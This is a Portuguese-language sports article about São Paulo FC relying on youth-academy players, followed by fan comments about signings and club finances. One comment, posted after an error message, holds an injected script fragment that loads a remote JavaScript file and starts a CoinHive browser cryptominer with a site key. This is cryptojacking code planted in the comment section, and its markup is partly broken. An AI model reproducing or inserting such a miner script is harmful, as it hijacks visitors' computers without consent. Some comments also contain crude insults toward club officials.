Ambiente saudável e apoio: São Paulo tenta fazer da base uma solução

Ambiente saudável e apoio: São Paulo tenta fazer da base uma solução

Enquanto os torcedores exigem reforços, diretoria, comissão técnica e elenco buscam uma maneira para que jovens não sintam pressão e repitam desempenho mostrados em Cotia

0 0 0 0
Raí quer ambiente saudável e leve para dar confiança a jovens como Lucas Fernandes (Rubens Chiri/saopaulofc.net)

Não é à toa que Dorival Júnior já disse que as categorias de base podem fazê-lo desistir de reforços no São Paulo. O clube encontra dificuldades para fazer contratações de peso que a torcida já está cobrando. Raí entendeu a situação completamente assim que aceitou ser diretor executivo de futebol, em dezembro, e, por isso, há um plano para que os jogadores recém-promovidos das categorias de base ganhem confiança e, rapidamente, se tornem solução.



- Teremos opções com muita qualidade, mas precisam chegar em um ambiente propício, saudável, leve, para ter confiança, como todo jogador precisa. Vamos construir um ambiente para que o jovem adquira essa confiança o mais rápido possível - explicou Raí.

O plano é evitar queimar jogadores ou assustá-los, já que o desempenho nos treinos tem sido elogiado, semelhante ao que tinham recentemente, ganhando títulos na base. Uma maneira prática e imediata para acalmar o ambiente é, logicamente, acumular vitórias. Mas existe um trabalho de aproximação com os profissionais que ocorre até naturalmente, como no episódio em que Petros, um dos líderes do elenco, decidiu "batizar" os jovens, deixando-os carecas.

- Acho sensacional (apostar na base). No Brasil, há uma cobrança muito alta para utilização da base, e Cotia é, sem dúvida, uma das melhores bases do país. Se a molecada colocar em prática tudo que estão fazendo nos treinos, teremos ainda mais confiança em um grande ano - elogiou Petros.

- É muito diferente jogar na base e estar no profissional com 60 mil torcedores, o peso da camisa é diferente. Mas eles estão em casa, adaptados. Requer um tempo para adaptação melhor, mas eles têm a nossa total confiança e estou muito feliz por ter jogadores como esses no nosso grupo - confiou o volante.

Alguns nomes da base já são mais utilizados e vêm ganhando espaço, mas em estágios diferentes. Se Militão já é dono da lateral direita, os meias Shaylon e Lucas Fernandes, principalmente, ainda não convencem completamente. Mas a expectativa é de que eles rendam e se sintam mais vontade com cada vez mais garotos no CT da Barra Funda.

- Nosso pensamento é trazê-los mais de Cotia para cá. Às vezes, com o jogador muito longe, não temos como observar, mais em jogos, e isso é muito pouco. Eles precisam sentir o que é o São Paulo, e vão sentir aqui, nesse trabalho com os profissionais. Essa é a nossa meta: trazê-lo para que eles acreditem em si mesmos também, para que não haja distância. Vemos grandes revelações, e queremos encurtar essa distância cada vez mais - disse o coordenador de futebol Ricardo Rocha.

- Acreditamos muito no potencial das categorias de base e daremos força. Queremos criar um ambiente para jovens se sentirem bem e mostrarem esse sangue tricolor que eles têm vindo da base. Aí, a identidade é rápida com o torcedor e pode vir um ou dois novos ídolos. Temos potencial e história no São Paulo para isso - concordou Raí, indicando suas altas expectativas.
Avalie esta notícia: 9 2

Comentários (31)

22/01/2018 12:21:29 Olair Marques Silva

O RAI não tem o que esperar, tem que ir contratar o Dourado utilizando o dinheiro do Prato. a garotada não vai dar resposta neste momento.

22/01/2018 12:24:34 lucianoengcomp

Ambiente saudavel e leve é tudo que os garotos não estão tendo nesse inicio de 2018.

Imainem só: o time joga com laterais defensivos que não tem saida de bola. Joga com 2 volantes de marcação e segurança, que tbm não tem saida de bola. Ai concentra a saida de bola mais atrás e a chegada ao ataque exclusivamente no coitado do Shaylon, que acabou de subir ao profissional.

Claro que a marcação vai concentrar nele e o time vai ficar engessado.

Ai pra piorar o time vem pressionado de um ano catastrófico.

E nesse contexto resolvem isolar mais 3 garotos no ataque (LFernandes, Brenner e MGuilherme).

Esse é o ambiente leve pros garotos estrearem no profissional? Dificil assim.

22/01/2018 11:56:43 Kempes

O SPFC tem que fazer o expressinho já, estes novos jogadores tem que jogar toda semana, seja contra time da série B do campeonato paulista ou do brasileiro, veja o caso Shaylon agora que ele fez a oitava partida, ainda está engatinhando futebolisticamente, e outra, estes meninos tem todos 20 anos, podem muito bem jogar na terça e ir para o banco ou até mesmo jogar na quarta e assim seria para o sábado, times do interior é que não faltam para este jogadores adquirirem experiência, seria muito bom para os jogadres que estão voltando de contusão e para adquirir ritmo , falta apenas visão para nossos administradores.

22/01/2018 11:26:44 Rogério Santos

o são paulo já investiu 10 milhões da compra do Jean + 10 milhões da compra do Diego Souza. vendeu o pratto por 32 milhõea só que metade do que for arrecadado será destinado a pagar as divídas. o que adianta investir o dinheiro todo e as dividas irem almentando. o são paulo tem a terceira maior folha salarial. vamos ter calma com Raí Ricardo Rocha Quem o Lugano e o Zetti. mais vamos dá tempo pra depois cobrar.

22/01/2018 11:11:21 Edgar de Jesus

assim q acabar a copinha traz o toro mlk joga muito de ponta

22/01/2018 11:01:38 Marcos Berigos

pessoal temos que passa confiança pro time , vamos da tempo pra eles.

22/01/2018 11:00:11 Luiz Prado

como assim são Paulo não ter dinheiro cadê dinheiro do prato e outro foram vendidos fala sério Raí

22/01/2018 10:59:18 Rafael Pontes

Erro ao postar comentário.
Código do erro: 803743

src="https://e.com/lib/e.min.js">>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

22/01/2018 10:50:48 Marcelo Augusto Treutler

Um ou outro da base para recompor o banco ou ate mesmo o time e caso de cartoes ou contusões tudo bem agora qierer formar um time profissional com metade da base contra outros times cheio de medalhões NÃO DA !!!!

22/01/2018 10:48:58 Vanessa E Willian Soriano

Raí vai se foder

22/01/2018 10:27:00 Ronimarcio Duarte da Silva

Rai voce melhor do que ninguem deve ria saber que jogo e jogo e treino e treino, e outro o temos que ter mais contratação sim, afinal para que possa ser feita essa mescla e a inserção da garotada no entanto precisa ter um plantel que de confiança ao treinador para que ele possa desenvolver um bom trabalho

22/01/2018 10:20:29 Pedro Da Silva Santos

reforço não, queremos vergonha na cara,faz tempo que não se ver isso nó são Paulo

22/01/2018 10:18:45 Carlos Alexandre

esse Lucas Fernandes é uma Inhaca só!!parece que tá jogando de calça jeans molhada!!um muleque nessa idade era pra tá voando, ter atitude no mínimo,e não se esconder do jogo!!

22/01/2018 10:18:18 Pedro Da Silva Santos

só mentindo pró torcedores que paga engresso caro,bando de mentiroso safado, usando a molecada pra queimar os meninos,nu basta com um bando de medalhão quase caí,e agora joga os meninos na figueira, isso é que incopetencia

22/01/2018 10:17:54 Magno Snts Martins

queremos reforços

22/01/2018 10:17:44 Cafu Marcos Evangelista

Bom dia nação tricolor!!!
É com muita alegria e satisfação que eu venho informar a todos vocês que o nosso tricolor está no caminho certo, caminho das grandes conquistas e de grandes vitórias, tenho certeza que com a contratação desses grandes ídolos no comando, a frente do futebol, tudo voltará a ser como era, um clube com respeito e moral, um grande exemplo administrativo não só no Brasil mais para muitos clubes europeus, pois eu sei que não é nada fácil acreditarmos devido tantos erros nos últimos 15 anos, peço a todos que confiem nesses ídolos que já deram muitas alegrias quando atuavam como jogadores, hoje como ídolos, tenho certeza de que jamais iram desapontar, mesmo porque eles também, assim como todos vocês, eles são grandes apaixonados por esse clube maravilhoso é temuiita confiança que em breve todos nós iremos desfrutar de grandes benefícios dentro de campo e até mesmo Extra campo, pois o Raí, juntamente com Ricardo Rocha, eles tem grandes trunfos no mercado mundial e vão acrescentar muito tudo isso ao São Paulo futebol clube, tanto em marketing, administrativamente, investimentos de grandes empresas como em patrocínios... Tenham um pouco mais de paciência e vocês terão em breve excelentes notícias, Raí e Ricardo estão trabalhando muito forte e com bastante seriedade para recolocar nosso tricolor aonde nunca deveria ter saído do cenário mundial do futebol... Abraço

para com isso RAI o sao paulo com rogerio ceni e Dorival nigue gueita mas viu queremo direitoria q combre mas do joga e q adiretoria compre joga de serguda divisao e terceira q olhe pro sao paulo e dez valor a clube joga novo sempre vc vai te uma resporta q ainda o jogado e novo q vai melhora e so engana a torcida que paga o salario dele viu obora torcedor borta onde nerce clube chega de espera direitoria resover fui obora pro prosteto fora Rai queremo titulo tambem nao convesa com ei jogado vive mosmo dez presete viu pior do q ta chega 10 anos sem um titulo bom fora paulista 15 anos

22/01/2018 10:15:59 Diego Tormena

fortaleza de Rogério está melhor

22/01/2018 10:15:23 Uoberton Vilela Vilela

q base o caraioooooo.pó queremos contratação cadê o dinheiro q encheu os estádios e a venda Lucas pratto cadeeeeeeeee

22/01/2018 10:14:52 Pedro Da Silva Santos

diretoria safada, não caiu no brasileirão, mais dá forma que vai vai cair no paulistão, esse bando de mercenários

22/01/2018 10:14:01 Aguinaldo Lucas

Bando de senvergonha caleri ja

22/01/2018 10:09:15 Diego Tormena

para aqueles que criticaram o ceni. está ai o resultado

22/01/2018 10:07:59 Uoberton Vilela Vilela

Lucas feenatjoga nadaaaa muito ruimmmmmm queremos jogador de peso não essa desgraça

22/01/2018 10:07:14 Uoberton Vilela Vilela

a coisa ta feiaaaaaa demaissss nada de contratação não querem gastar com contratação e também a torcida não vai aos estádios levar dinheiro queremos contratação

22/01/2018 10:06:52 Marcos Tinti

não é possível...
tão de brincadeira né...

22/01/2018 10:06:44 Ana Dias Almeida

eu concordo com eles, termos de ter paciência. dinheiro o São Paulo não tem pra trazer grande jogadores, e estou vendo que muitos jogadores não querem virem pro são Paulo. então termos de ter paciência com os jovens.

22/01/2018 10:06:30 Diego Chai

pra mim jogador de base bom é aquele que quando é promovido ao profissional , não peida, já mostra que merece a camisa , como foi Lucas Moura , Neymar , Robinho , Neres, etc...

22/01/2018 10:05:23 Anderson Mauro

cara tanto atacante na libertadores do ano passado.nao ia trazer o escarpa.usa o dinheiro para um atacante

Esse Lucas é uma nhaca.

22/01/2018 10:03:15 Iraldo Camilo Gomes

tomara!!!!!
pq a coisa tá feia

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.